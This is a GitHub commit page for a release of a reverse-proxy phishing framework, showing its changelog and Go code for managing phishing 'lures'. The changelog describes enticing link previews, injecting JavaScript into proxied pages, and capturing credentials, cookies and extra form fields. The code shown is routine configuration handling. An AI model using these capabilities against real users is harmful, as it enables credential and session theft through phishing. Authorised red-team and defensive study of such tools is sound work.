Skip to content

Commit

Permalink
2.3.0 released
Browse files Browse the repository at this point in the history
  • Loading branch information
kgretzky committed Feb 2, 2021
1 parent 7b6a84c commit b03a38d
Show file tree
Hide file tree
Showing 17 changed files with 1,028 additions and 160 deletions.
21 changes: 21 additions & 0 deletions CHANGELOG
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
2.3.0
- Proxy can now create most of required `sub_filters` on its own, making it much easier to create new phishlets.
- Added lures, with which you can prepare custom phishing URLs with each having its own set of unique options (`help lures` for more info).
- Added OpenGraph settings for lures, allowing to create enticing content for link previews.
- Added ability to inject custom Javascript into proxied pages.
- Injected Javascript can be customized with values of custom parameters, specified in lure options.
- Deprecated `landing_path` and replaced it with `login` section, which contains the domain and path for website's login page.

2.2.1
- Fixed: `type` with value `json` was not correctly activated when set under `credentials`.

2.2.0
- Now when any of `auth_urls` is triggered, the redirection will take place AFTER response cookies for that request are captured.
- Regular expression groups working with `sub_filters`.
- Phishlets are now listed in a table.
- Restructured phishlet YAML config file to be easier to understand (phishlets from previous versions need to be updated to new format).
- Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises.
- All search fields in the phishlet are now regular expressions by default (remember about proper escaping!).
- Added option to capture custom POST arguments additionally to credentials. Check `custom` field under `credentials`.
- Added feature to inject custom POST arguments to requests. Useful when forcing users to tick that "Remember me" checkbox.
- Removed 'name' variable from phishlets. Phishlet name is now determined solely based on the filename.
2 changes: 1 addition & 1 deletion core/banner.go
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@ import (
)

const (
VERSION = "2.2.2"
VERSION = "2.3.0"
)

func putAsciiArt(s string) {
Expand Down
82 changes: 82 additions & 0 deletions core/config.go
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,18 @@ import (
"github.com/spf13/viper"
)

type Lure struct {
Path string `mapstructure:"path" yaml:"path"`
RedirectUrl string `mapstructure:"redirect_url" yaml:"redirect_url"`
Phishlet string `mapstructure:"phishlet" yaml:"phishlet"`
Info string `mapstructure:"info" yaml:"info"`
OgTitle string `mapstructure:"og_title" yaml:"og_title"`
OgDescription string `mapstructure:"og_desc" yaml:"og_desc"`
OgImageUrl string `mapstructure:"og_image" yaml:"og_image"`
OgUrl string `mapstructure:"og_url" yaml:"og_url"`
Params map[string]string `mapstructure:"params" yaml:"params"`
}

type Config struct {
siteDomains map[string]string
baseDomain string
Expand All @@ -24,6 +36,7 @@ type Config struct {
verificationParam string
verificationToken string
redirectUrl string
lures []*Lure
cfg *viper.Viper
}

Expand All @@ -37,6 +50,7 @@ const (
CFG_VERIFICATION_PARAM = "verification_key"
CFG_VERIFICATION_TOKEN = "verification_token"
CFG_REDIRECT_URL = "redirect_url"
CFG_LURES = "lures"
)

const DEFAULT_REDIRECT_URL = "https://www.youtube.com/watch?v=dQw4w9WgXcQ" // Rick'roll
Expand All @@ -48,6 +62,7 @@ func NewConfig(cfg_dir string, path string) (*Config, error) {
sitesHidden: make(map[string]bool),
phishlets: make(map[string]*Phishlet),
phishletNames: []string{},
lures: []*Lure{},
}

c.cfg = viper.New()
Expand Down Expand Up @@ -109,6 +124,8 @@ func NewConfig(cfg_dir string, path string) (*Config, error) {
if c.redirectUrl == "" {
c.SetRedirectUrl(DEFAULT_REDIRECT_URL)
}
c.lures = []*Lure{}
c.cfg.UnmarshalKey(CFG_LURES, &c.lures)

return c, nil
}
Expand Down Expand Up @@ -308,6 +325,71 @@ func (c *Config) AddPhishlet(site string, pl *Phishlet) {
c.phishlets[site] = pl
}

func (c *Config) AddLure(site string, l *Lure) {
c.lures = append(c.lures, l)
c.cfg.Set(CFG_LURES, c.lures)
c.cfg.WriteConfig()
}

func (c *Config) SetLure(index int, l *Lure) error {
if index >= 0 && index < len(c.lures) {
c.lures[index] = l
} else {
return fmt.Errorf("index out of bounds: %d", index)
}
c.cfg.Set(CFG_LURES, c.lures)
c.cfg.WriteConfig()
return nil
}

func (c *Config) DeleteLure(index int) error {
if index >= 0 && index < len(c.lures) {
c.lures = append(c.lures[:index], c.lures[index+1:]...)
} else {
return fmt.Errorf("index out of bounds: %d", index)
}
c.cfg.Set(CFG_LURES, c.lures)
c.cfg.WriteConfig()
return nil
}

func (c *Config) DeleteLures(index []int) []int {
tlures := []*Lure{}
di := []int{}
for n, l := range c.lures {
if !intExists(n, index) {
tlures = append(tlures, l)
} else {
di = append(di, n)
}
}
if len(di) > 0 {
c.lures = tlures
c.cfg.Set(CFG_LURES, c.lures)
c.cfg.WriteConfig()
}
return di
}

func (c *Config) GetLure(index int) (*Lure, error) {
if index >= 0 && index < len(c.lures) {
return c.lures[index], nil
} else {
return nil, fmt.Errorf("index out of bounds: %d", index)
}
}

func (c *Config) GetLureByPath(site string, path string) (*Lure, error) {
for _, l := range c.lures {
if l.Phishlet == site {
if l.Path == path {
return l, nil
}
}
}
return nil, fmt.Errorf("lure for path '%s' not found", path)
}

func (c *Config) GetPhishlet(site string) (*Phishlet, error) {
pl, ok := c.phishlets[site]
if !ok {
Expand Down
Loading

0 comments on commit b03a38d

Please sign in to comment.